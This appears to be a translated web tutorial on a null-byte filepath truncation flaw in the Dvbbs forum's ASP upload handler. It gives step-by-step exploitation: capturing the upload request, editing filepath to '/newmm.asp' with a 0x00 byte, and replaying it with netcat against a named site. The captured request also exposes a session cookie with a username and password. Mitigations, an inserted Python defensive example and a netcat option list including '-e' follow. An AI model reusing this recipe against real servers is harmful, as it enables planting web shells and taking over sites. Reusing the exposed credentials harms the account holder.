PHP and ASP Upload Vulnerability Inquiry

Source: Internet
Author: User
This article examines the upload vulnerability in ASP and PHP scripts that accept file uploads through a form.

1 Tools and scope

The vulnerability applies only to ASP and PHP scripts that accept uploads in form (multipart) format.

nc (netcat)
Used to submit the data packet.
Run the following command at the DOS prompt:
nc -vv www.****.com 80 < 1.txt
-vv: verbose echo
80: the web server port
1.txt: the data packet you want to send (for more usage, see the post in this forum section)
wse (WSockExpert) monitors local ports and captures the packets submitted by IE.

2 vulnerability principle

Assumptions in the following example:

Web host: www.****.com
BBS path: /bbs/

The vulnerability was found by studying file uploads in the Dvbbs (Dynamic Network) forum. It helps to have some programming experience when reading Dvbbs's upfile.asp; you do not need to understand all of it. upfile.asp receives the upload from a form that looks like the one below:

 

Variables used:

filepath, default value uploadface, attribute hidden
act, default value upload, attribute hidden
file1 is the file you want to upload.

The key is the filepath variable!

By default, our files are uploaded to www. ***. com/bbs/uploadface/

The file is named after the upload time, by this line in upfile.asp:

filename = formpath & year(now) & month(now) & day(now) & hour(now) & minute(now) & second(now) & rannum & "." & fileext
--------------------------------------

We know that in the computer a string is terminated by a null byte; anyone who has used C knows that char data[] = "bbs" has an array length of 4: 'b', 'b', 's', '\0'.
What if we construct filepath as follows?

filepath = "/newmm.asp" followed by a 0x00 byte

Suppose we upload a file at 02:16 on 2004-09-24. Where it would normally be saved as http://www.***.com/bbs/uploadface/2004092402.16.jpg, the path now becomes http://www.***.com/newmm.asp/2004092402.16.jpg.

When the server receives the filepath data it stops reading at the null byte, so everything after newmm.asp is dropped and filepath is understood as /newmm.asp. As a result the uploaded file (c:.asp in the original example) is saved as http://www.***.com/newmm.asp.

3 Supplement

After the vulnerability was published, many websites patched it, but none of them filter filepath itself. There are a lot of such sites; the only difference between them is the number of hidden variables they add, which is what the upload exploitation tools (Veteran's filepath variable tool and the like) are built around. Website plug-ins have similar vulnerabilities. What I want to say is: do not rely on specialised tools. Change the filepath variable in the packet captured by wse and submit it with nc; no matter how many hidden variables the site adds, it does not help. Of course, once filepath is strictly filtered, all of this ends.

4. Detailed instance
1. Packet captured by wse (saved to 1.txt):

post /bbs/upphoto/upfile.asp http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
referer: http://www.xin126.com/bbs/upphoto/upload.asp
accept-language: zh-cn
content-type: multipart/form-data; boundary=-----------7d423a138d0278
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
host: www.xin126.com
content-length: 1969
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidaccccdcs=njhcphpalbcankobechkjanf; iscome=1; gamvancookies=1; regtime=2004%2d9%2d24+3%3a39%3a37; username=szjwwwww; pass=5211314; dl=0; userid=62; ltstyle=0; logintry=1; userpass=eb03f6c72908fd84

-----------------------------7d423a138d0278
content-disposition: form-data; name="filepath"

../medias/myphoto/
-----------------------------7d423a138d0278
... ...

Upload
-----------------------------7d423a138d0278--

2. Open 1.txt in UltraEdit and change the data:

......
-----------------------------7d423a138d0278
Content-disposition: form-data; name="filepath"

/newmm.asp  <= the highlighted byte after .asp is a space, 0x20; change it to 0x00
......
-----------------------------

3. Recalculate the Content-Length and submit the packet with nc:

nc -vv www.xin126.com 80 < 1.txt

UltraEdit is a hex editor that can be downloaded from the Internet.
We use it mainly to write the terminating marker, which in hex is 0x00 (00h).
In fact, all you need to change is to append a 00 byte at the end of filepath.

Recalculating the Content-Length: after you change filepath the body length has changed, so the value must be increased or decreased accordingly.


......
Host: www.xin126.com
Content-length: 1969 <======
Connection: keep-alive
Cache-control: no-cache
......

How to count? Each letter or digit is 1 byte.

Solutions for the upload vulnerability (for reference only):

1. Generally the upload path is handled as a variable.
==> Our countermeasure is to turn filepath into a constant, fixed on the server side.
This is currently the most effective method (I think).

2. Strengthen the parsing. The server currently stops reading filepath as soon as it meets the null byte; if it instead reads on until the start of the next form variable (the boundary) and treats the whole span as the value, the processing will be fine.
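The two countermeasures above, as an added Python example that is not code from the article or from Dvbbs: a multipart parser that splits on the boundary so a null byte stays inside the value, a check that flags what the upload handler or a WAF should reject in filepath, and a save-path builder that uses a constant directory. The boundary and field names are taken from the capture in section 4; the sample body, the extension whitelist and UPLOAD_DIR are constructed assumptions.

```python
import re
from datetime import datetime

BOUNDARY = b"---------------------------7d423a138d0278"  # boundary from the article's capture
UPLOAD_DIR = "/bbs/uploadface/"  # fixed server-side directory (countermeasure 1)
ALLOWED_EXTS = ("jpg", "gif")    # assumed whitelist for a forum photo upload

def build_body(filepath: bytes) -> bytes:
    """Constructed multipart body in the shape of the article's capture (not a real packet)."""
    d = b"--" + BOUNDARY + b"\r\n"
    return (d + b'Content-Disposition: form-data; name="filepath"\r\n\r\n' + filepath + b"\r\n"
            + d + b'Content-Disposition: form-data; name="act"\r\n\r\nupload\r\n'
            + d + b'Content-Disposition: form-data; name="file1"; filename="me.jpg"\r\n'
            + b"Content-Type: image/jpeg\r\n\r\n\xff\xd8\xff\xe0fake\r\n"
            + b"--" + BOUNDARY + b"--\r\n")

def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Countermeasure 2: split on the boundary only, so 0x00 inside a value stays data."""
    fields = {}
    for part in body.split(b"--" + boundary)[1:]:
        if part.startswith(b"--"):
            break  # closing delimiter
        head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', head)
        if m:
            fields[m.group(1).decode()] = value[:-2]  # strip the trailing CRLF
    return fields

def filepath_findings(value: bytes) -> list:
    """What a WAF or the upload handler should flag about a client-supplied filepath."""
    findings = []
    truncated = value.split(b"\x00")[0]  # what a null-terminating server would see
    if b"\x00" in value:
        findings.append("null byte: filepath would be truncated to %r" % truncated)
    if truncated.lower().endswith((b".asp", b".php")):
        findings.append("truncated filepath ends in a script extension")
    return findings

def safe_save_path(client_name: str, now: datetime, rannum: int) -> str:
    """Hardened naming: constant directory, server-made name, whitelisted extension."""
    ext = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    if ext not in ALLOWED_EXTS:
        raise ValueError("extension not allowed: %r" % ext)
    return UPLOAD_DIR + now.strftime("%Y%m%d%H%M%S") + str(rannum) + "." + ext

def demo() -> dict:
    fields = parse_multipart(build_body(b"/newmm.asp\x00"), BOUNDARY)
    return {"filepath": fields["filepath"], "findings": filepath_findings(fields["filepath"]),
            "benign": filepath_findings(b"../medias/myphoto/"),
            "saved": safe_save_path("me.jpg", datetime(2004, 9, 24, 2, 16, 0), 7)}
```

The client's filepath field never reaches the filesystem: it is only inspected for logging or rejection, while the stored path comes from UPLOAD_DIR and the server clock.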

Appendix: nc usage:

Connect to a remote host:
nc [-options] hostname port[s] [ports] ...
Listen on the local host:
nc -l -p port [options] [hostname] [port]
Options:
-d detach from console, stealth mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: m-n [inclusive]

Original source: http://www.bkjia.com/PHPjc/446845.html
